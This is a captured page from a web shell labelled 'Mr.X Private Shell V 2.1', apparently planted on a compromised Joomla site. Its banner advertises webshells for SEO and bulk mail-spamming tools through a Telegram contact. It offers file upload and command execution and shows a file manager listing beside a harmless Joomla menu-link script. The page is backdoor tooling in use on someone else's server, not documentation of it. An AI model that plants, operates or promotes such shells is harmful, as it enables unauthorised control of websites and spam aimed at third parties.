__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/**
 * @copyright  (C) 2017 Open Source Matters, Inc. <https://www.joomla.org>
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */
((Joomla, document) => {

  /**
   * Javascript to insert the link
   * View element calls jSelectContact when a contact is clicked
   * jSelectContact creates the link tag, sends it to the editor,
   * and closes the select frame.
   */
  window.jSelectMenuItem = (id, title, uri, object, link, lang) => {
    let thislang = '';
    if (!Joomla.getOptions('xtd-menus')) {
      // Something went wrong!
      window.parent.Joomla.Modal.getCurrent().close();
      throw new Error('core.js was not properly initialised');
    }

    // eslint-disable-next-line prefer-destructuring
    const editor = Joomla.getOptions('xtd-menus').editor;
    if (lang !== '') {
      thislang = '&lang=';
    }
    const tag = `<a href="${uri + thislang + lang}">${title}</a>`;

    // Insert the link in the editor
    if (window.parent.Joomla.editors.instances[editor].getSelection()) {
      window.parent.Joomla.editors.instances[editor].replaceSelection(`<a href="${uri + thislang + lang}">${window.parent.Joomla.editors.instances[editor].getSelection()}</a>`);
    } else {
      window.parent.Joomla.editors.instances[editor].replaceSelection(tag);
    }

    // Close the modal
    if (window.parent.Joomla && window.parent.Joomla.Modal) {
      window.parent.Joomla.Modal.getCurrent().close();
    }
  };

  // Get the elements
  const elements = [].slice.call(document.querySelectorAll('.select-link'));
  elements.forEach(element => {
    // Listen for click event
    element.addEventListener('click', event => {
      event.preventDefault();
      const functionName = event.target.getAttribute('data-function');
      if (functionName === 'jSelectMenuItem') {
        // Used in xtd_contacts
        window[functionName](event.target.getAttribute('data-id'), event.target.getAttribute('data-title'), event.target.getAttribute('data-uri'), null, null, event.target.getAttribute('data-language'));
      } else {
        // Used in com_menus
        window.parent[functionName](event.target.getAttribute('data-id'), event.target.getAttribute('data-title'), null, null, event.target.getAttribute('data-uri'), event.target.getAttribute('data-language'), null);
      }

      // Close the modal
      if (window.parent.Joomla.Modal) {
        window.parent.Joomla.Modal.getCurrent().close();
      }
    });
  });
})(Joomla, document);

Filemanager

Name Type Size Permission Actions
admin-item-edit-es5.js File 4.45 KB 0664
admin-item-edit-es5.min.js File 2.97 KB 0664
admin-item-edit-es5.min.js.gz File 1.05 KB 0664
admin-item-edit.js File 4.13 KB 0664
admin-item-edit.min.js File 2.83 KB 0664
admin-item-edit.min.js.gz File 1.02 KB 0664
admin-item-edit_container-es5.js File 1.64 KB 0664
admin-item-edit_container-es5.min.js File 806 B 0664
admin-item-edit_container-es5.min.js.gz File 450 B 0664
admin-item-edit_container.js File 1.23 KB 0664
admin-item-edit_container.min.js File 633 B 0664
admin-item-edit_container.min.js.gz File 418 B 0664
admin-item-edit_modules-es5.js File 3.43 KB 0664
admin-item-edit_modules-es5.min.js File 2.16 KB 0664
admin-item-edit_modules-es5.min.js.gz File 807 B 0664
admin-item-edit_modules.js File 3.15 KB 0664
admin-item-edit_modules.min.js File 2.02 KB 0664
admin-item-edit_modules.min.js.gz File 791 B 0664
admin-item-modal-es5.js File 612 B 0664
admin-item-modal-es5.min.js File 467 B 0664
admin-item-modal-es5.min.js.gz File 334 B 0664
admin-item-modal.js File 530 B 0664
admin-item-modal.min.js File 428 B 0664
admin-item-modal.min.js.gz File 317 B 0664
admin-items-modal-es5.js File 2.63 KB 0664
admin-items-modal-es5.min.js File 1.46 KB 0664
admin-items-modal-es5.min.js.gz File 605 B 0664
admin-items-modal.js File 2.43 KB 0664
admin-items-modal.min.js File 1.4 KB 0664
admin-items-modal.min.js.gz File 583 B 0664
admin-menus-default-es5.js File 1.09 KB 0664
admin-menus-default-es5.min.js File 728 B 0664
admin-menus-default-es5.min.js.gz File 461 B 0664
admin-menus-default.js File 962 B 0664
admin-menus-default.min.js File 634 B 0664
admin-menus-default.min.js.gz File 438 B 0664
default-batch-body-es5.js File 788 B 0664
default-batch-body-es5.min.js File 433 B 0664
default-batch-body-es5.min.js.gz File 313 B 0664
default-batch-body.js File 689 B 0664
default-batch-body.min.js File 402 B 0664
default-batch-body.min.js.gz File 299 B 0664
Filemanager